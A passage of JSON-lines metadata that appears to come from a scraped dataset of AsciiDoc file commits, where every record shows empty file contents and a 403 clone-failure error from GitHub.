docs\n","repos":"anoordover\/camel,curso007\/camel,jonmcewen\/camel,pmoerenhout\/camel,curso007\/camel,sverkera\/camel,gnodet\/camel,apache\/camel,dmvolod\/camel,adessaigne\/camel,snurmine\/camel,tadayosi\/camel,alvinkwekel\/camel,mcollovati\/camel,CodeSmell\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,tdiesler\/camel,davidkarlsen\/camel,kevinearls\/camel,DariusX\/camel,Fabryprog\/camel,sverkera\/camel,christophd\/camel,tdiesler\/camel,akhettar\/camel,onders86\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,alvinkwekel\/camel,objectiser\/camel,akhettar\/camel,cunningt\/camel,kevinearls\/camel,isavin\/camel,curso007\/camel,apache\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,tdiesler\/camel,isavin\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,adessaigne\/camel,zregvart\/camel,cunningt\/camel,gautric\/camel,sverkera\/camel,rmarting\/camel,isavin\/camel,ullgren\/camel,alvinkwekel\/camel,rmarting\/camel,gnodet\/camel,onders86\/camel,pmoerenhout\/camel,rmarting\/camel,adessaigne\/camel,onders86\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,adessaigne\/camel,zregvart\/camel,mcollovati\/camel,gautric\/camel,jamesnetherton\/camel,pax95\/camel,onders86\/camel,christophd\/camel,snurmine\/camel,nikhilvibhav\/camel,mcollovati\/camel,CodeSmell\/camel,curso007\/camel,gnodet\/camel,gautric\/camel,apache\/camel,ullgren\/camel,curso007\/camel,adessaigne\/camel,sverkera\/camel,tadayosi\/camel,pmoerenhout\/camel,gautric\/camel,jamesnetherton\/camel,CodeSmell\/camel,ullgren\/camel,onders86\/camel,pmoerenhout\/camel,CodeSmell\/camel,rmarting\/camel,adessaigne\/camel,isavin\/camel,jonmcewen\/camel,sverkera\/camel,dmvolod\/camel,anoordover\/camel,sverkera\/camel,gautric\/camel,onders86\/camel,pmoerenhout\/camel,jonmcewen\/camel,Fabryprog\/camel,ullgren\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,dmvolod\/camel,snurmine\/camel,akhettar\/camel,dmvolod\/camel,snurmine\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,nicolaferraro\/camel,akhettar\/camel,rmarting\/camel,zregvart\/camel,gnodet\/camel,isavin\/camel,jamesnetherton\/camel,curso007\/camel,objectiser\/camel,anoordover\/camel,anoordover\/camel,nikhilvibhav\/camel,DariusX\/camel,davidkarlsen\/camel,apache\/camel,jonmcewen\/camel,anoordover\/camel,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,dmvolod\/camel,Fabryprog\/camel,dmvolod\/camel,christophd\/camel,jamesnetherton\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,nicolaferraro\/camel,kevinearls\/camel,tadayosi\/camel,akhettar\/camel,Fabryprog\/camel,anoordover\/camel,apache\/camel,jonmcewen\/camel,gautric\/camel,objectiser\/camel,pax95\/camel,snurmine\/camel,tadayosi\/camel,akhettar\/camel,kevinearls\/camel,christophd\/camel,kevinearls\/camel,jamesnetherton\/camel,kevinearls\/camel,alvinkwekel\/camel,cunningt\/camel,nikhilvibhav\/camel,jonmcewen\/camel,objectiser\/camel,nicolaferraro\/camel,nicolaferraro\/camel,DariusX\/camel,snurmine\/camel,isavin\/camel,rmarting\/camel,pax95\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/wireTap-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/wireTap-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e885bd1abfe280b28eb76c0dd6c28d35d0d56345","subject":"Update 2016-11-12-Hacking-News-121116.adoc","message":"Update 
2016-11-12-Hacking-News-121116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-12-Hacking-News-121116.adoc","new_file":"_posts\/2016-11-12-Hacking-News-121116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3478418695617dafd9627ea3f61196619b67ac20","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73120b1ed6629f729e412eebf08ca0659bf47c86","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5663e794978d7257bc6530f816c82dffdcd95764","subject":"Update 2015-10-04-Lets-talk-about-mitigation.adoc","message":"Update 2015-10-04-Lets-talk-about-mitigation.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-10-04-Lets-talk-about-mitigation.adoc","new_file":"_posts\/2015-10-04-Lets-talk-about-mitigation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c04bee882a8e7b19dc4fba7b73abd92d0fd011d","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e3a5aad726f49de1cf9ea0a0d2bc9cbd7a68435","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f714d120a77157ff546dc34b9aaf9b4f5cd45969","subject":"Update 2011-07-08-Elte-Heart.adoc","message":"Update 2011-07-08-Elte-Heart.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-07-08-Elte-Heart.adoc","new_file":"_posts\/2011-07-08-Elte-Heart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcebe5f01c52915e71ce5f135e88a351027126b8","subject":"Apicurio blogpost","message":"Apicurio blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-04-09-debezium-apicurio-registry.adoc","new_file":"blog\/2020-04-09-debezium-apicurio-registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"625095d1c38b2e1b2d2019a0bf357e7fbea6d75a","subject":"Update 2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","message":"Update 2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","new_file":"_posts\/2017-06-19-Building-and-Testing-Golang-Applications-with-Travis-CI-and-Coveralls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a9d9fc7495a60a4191d207dd24c75061592e68","subject":"new post","message":"new post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-07-sneak-preview.adoc","new_file":"content\/news\/2017-07-07-sneak-preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8f7ab122a01c76ca7aab4934c705b1fa36ae8c9a","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_space_exploration.adoc","new_file":"content\/writings\/on_space_exploration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"69a3d80a7fca0597f04324a3ffa03353c7fe0e20","subject":"Update 2016-04-23-Battle-Fatigue.adoc","message":"Update 2016-04-23-Battle-Fatigue.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-04-23-Battle-Fatigue.adoc","new_file":"_posts\/2016-04-23-Battle-Fatigue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f868ac355126a304da2ae78fd64c02cc983ec279","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"019b494271b38ebcf9c51f32f64783b9ccf96aac","subject":"notes was added","message":"notes was added\n","repos":"iDoka\/eda-scripts,iDoka\/eda-scripts","old_file":"scratch.adoc","new_file":"scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iDoka\/eda-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3ed96024a7c71ace29d9fececdfd148332a6cf","subject":"Add basic README to docker-dist module","message":"Add basic README to docker-dist module\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1eba8da8def3f80f4d17501d3c20c42dd87017f","subject":"Update readme","message":"Update readme\n","repos":"asciidocfx\/asciidoctor.js-reveal-demo,asciidocfx\/asciidoctor.js-reveal-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/asciidoctor.js-reveal-demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d66973fc4a5ef41b40858f79fad9b20695163218","subject":"Update OS X details in README","message":"Update OS X details in README\n\nChange-Id: I75cea555b4d7ab44b9272d03726ed3431f7d9c83\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1049\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4225f319b7eaf53ad6489cd4e6a064c48a5e2793","subject":"Add root readme","message":"Add root readme\n","repos":"vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets,vjuranek\/infinispan-snippets","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vjuranek\/infinispan-snippets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d787d69ff99552ff7878c32ea2fad45f7ee53dc5","subject":"add README","message":"add README\n","repos":"pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,pkleimann\/livingdoc2,LivingDoc\/livingdoc,Drakojin\/livingdoc2,pkleimann\/livingdoc2,Drakojin\/livingdoc2,pkleimann\/livingdoc,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,pkleimann\/livingdoc,Drakojin\/livingdoc2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d843fc0ea9904116796e899fd6b6ed86134c444","subject":"Create README.adoc","message":"Create README.adoc","repos":"igagis\/prorab,igagis\/prorab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/prorab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d96cceea2457250548b22d2d4a941475130e6507","subject":"Small readme for using this stuff.","message":"Small readme for using this stuff.\n","repos":"sudiamanj\/TuneJar","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sudiamanj\/TuneJar.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1093057be16f9bf0816823441c7bd55bc90f8fd","subject":"adding version used for testing workshop","message":"adding version used for testing workshop\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce81cdd9eeb9458ebc7bc7bdf3db82af5bab691c","subject":"y2b create post WTF IS A DARKVOICE?","message":"y2b create post WTF IS A DARKVOICE?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-13-WTF-IS-A-DARKVOICE.adoc","new_file":"_posts\/2014-05-13-WTF-IS-A-DARKVOICE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57310d7d86be6aae957c14ace6252b0abec13779","subject":"Update 
2015-07-12-Meet-the-Team-Gina.adoc","message":"Update 2015-07-12-Meet-the-Team-Gina.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-12-Meet-the-Team-Gina.adoc","new_file":"_posts\/2015-07-12-Meet-the-Team-Gina.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eb30847fe26eda35c9e8eeaedd3bca5c6e15687","subject":"Update 2019-05-22-Picture-In-Picture-API.adoc","message":"Update 2019-05-22-Picture-In-Picture-API.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2019-05-22-Picture-In-Picture-API.adoc","new_file":"_posts\/2019-05-22-Picture-In-Picture-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cbac1fae407b5de5ab72fda702f58bb7eedeb7e","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31e514ac00b70afe43706156ca8f2220d9ee7a9","subject":"agent now uses non-camel-case naming convention","message":"agent now uses non-camel-case naming convention","repos":"hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a654fc12dea79d8fb49128451a527f91bca6f00","subject":"Update 2015-02-10-Blog-Title-2.adoc","message":"Update 
2015-02-10-Blog-Title-2.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a9ab2fcab00611c7b5f579f1dc9bea08b5596d6","subject":"1.1.0.CR1 announcement","message":"1.1.0.CR1 announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-13-debezium-1-1-c1-released.adoc","new_file":"blog\/2020-03-13-debezium-1-1-c1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62311a2480fcd3625181683270c600e84ecff9a6","subject":"Update 2016-10-19-algo-1517.adoc","message":"Update 2016-10-19-algo-1517.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-1517.adoc","new_file":"_posts\/2016-10-19-algo-1517.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b7e8e5ecf9599c4e0f6d47e06859750bc7f857","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c206a3558a4450af4ccc220a689d2005ed4ba16","subject":"Release notes update","message":"Release notes update\n","repos":"mehtabsinghmann\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"RELEASENOTES.adoc","new_file":"RELEASENOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a77b0895043563b4a9ce136012b1f98d8457b7fd","subject":"Added documentation for the resources module.","message":"Added documentation for the resources 
module.\n","repos":"marschall\/incubator-tamaya,syzer\/incubator-tamaya,apache\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,syzer\/incubator-tamaya,apache\/incubator-tamaya,marschall\/incubator-tamaya,apache\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya","old_file":"docs\/mod_resources.adoc","new_file":"docs\/mod_resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marschall\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f047aeb011bc7cddaabb628ea68e9aef2a050be3","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaefa866740984f5db3da8dbd52d3d3b2cb52ecf","subject":"script stage documentation","message":"script stage documentation","repos":"spinnaker\/gate,cfieber\/gate,cfieber\/gate,spinnaker\/gate,spinnaker\/gate,cfieber\/gate","old_file":"gate-manual\/src\/asciidoc\/scriptStage.adoc","new_file":"gate-manual\/src\/asciidoc\/scriptStage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfieber\/gate.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"222b6b3bdddb61ccad0224d02e436dc28191a885","subject":"Update CHANGELOG.adoc","message":"Update CHANGELOG.adoc\n\nAdd changes for the version 
0.5.1","repos":"ciena-blueplanet\/developers.blog,pdudits\/pdudits.github.io,aspick\/hubpress.io,mrfgl\/blog,magivfer\/pages,mrtrombley\/blog,jlmcgehee21\/nooganeer,sxgc\/blog,OlympusOnline2\/announcements,nthline\/hubpress.io,elinep\/blog,brendena\/hubpress.io,joescharf\/joescharf.github.io,cmolitor\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,joescharf\/joescharf.github.io,mairandomness\/randomblog,JohanBrunet\/hubpress.io,pramodjg\/articles,ruaqiwei23\/blog,gogonkt\/makenothing,palaxi00\/palaxi00.github.io,ErJ101\/hbspractise,joshuarrrr\/hubpress.io,sebarid\/pages,sakkemo\/blog,akhmetgali\/hubpress.io,simonturesson\/hubpresstestsimon,chackomathew\/blog,willcrisis\/www.willcrisis.com,jsiu22\/blog,gsha0\/hubpress.io,mcornell\/OFM,laibaogo\/hubpress.io,crotel\/studio,pdudits\/pdudits.github.io,xinmeng1\/note,mrtrombley\/blog,jabbytechnologies\/blog,joescharf\/joescharf.github.io,kobusb\/blog,fghhfg\/hubpress.io,sebarid\/pages,seturne\/hubpress.io,brendena\/hubpress.io,mrfgl\/blog,Port666\/hubpress.io,ottoandry\/ottoandry1,seturne\/hubpress.io,ErJ101\/hbspractise,mcornell\/OFM,dmacstack\/glob,Port666\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,Jason2013\/hubpress,dsuryakusuma\/dsuryakusuma.github.io,josegomezr\/blog,SockPastaRock\/hubpress.io,atomfrede\/shiny-adventure,DaOesten\/hubpress.io,anshu92\/blog,magivfer\/pages,palaxi00\/palaxi00.github.io,andreassiegelrfid\/hubpress.io,sebprev\/blog,koter84\/blog,JohanBrunet\/hubpress.io,ottoandry\/ottoandry1,mrfgl\/blog,josegomezr\/blog,pdudits\/hubpress,nicolaschaillot\/pechdencouty,arabindamoni\/hubpress.io,manelvf\/blog,ashalkhakov\/hubpress.io,Jason2013\/hubpress,qingyuqy\/qingyuqy.io,AnassKartit\/anasskartit.github.io,moonPress\/press.io,hiun\/hubpress.io,apoch\/blog,gogonkt\/makenothing,Abdul2\/abdul2.github.io,Abdul2\/abdul2.github.io,lrabiet\/patisserie,jamarortiz\/pragmaticalware,anwfr\/blog.anw.fr,Bloggerschmidt\/bloggerschmidt.de,JohanBrunet\/hubpress.io,tom-konda\/blog,agentmilindu\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,sakkemo\/blog,entropyz\/blog,crotel\/meditation,cmhgroupllc\/blog,adjiebpratama\/press,chackomathew\/blog,PerthHackers\/blog,plyom\/hubpress.io,ErJ101\/hbspractise,princeminz\/blog,porolakka\/hubpress.io,btsibr\/myhubpress,atomfrede\/shiny-adventure,nthline\/hubpress.io,aql\/hubpress.io,c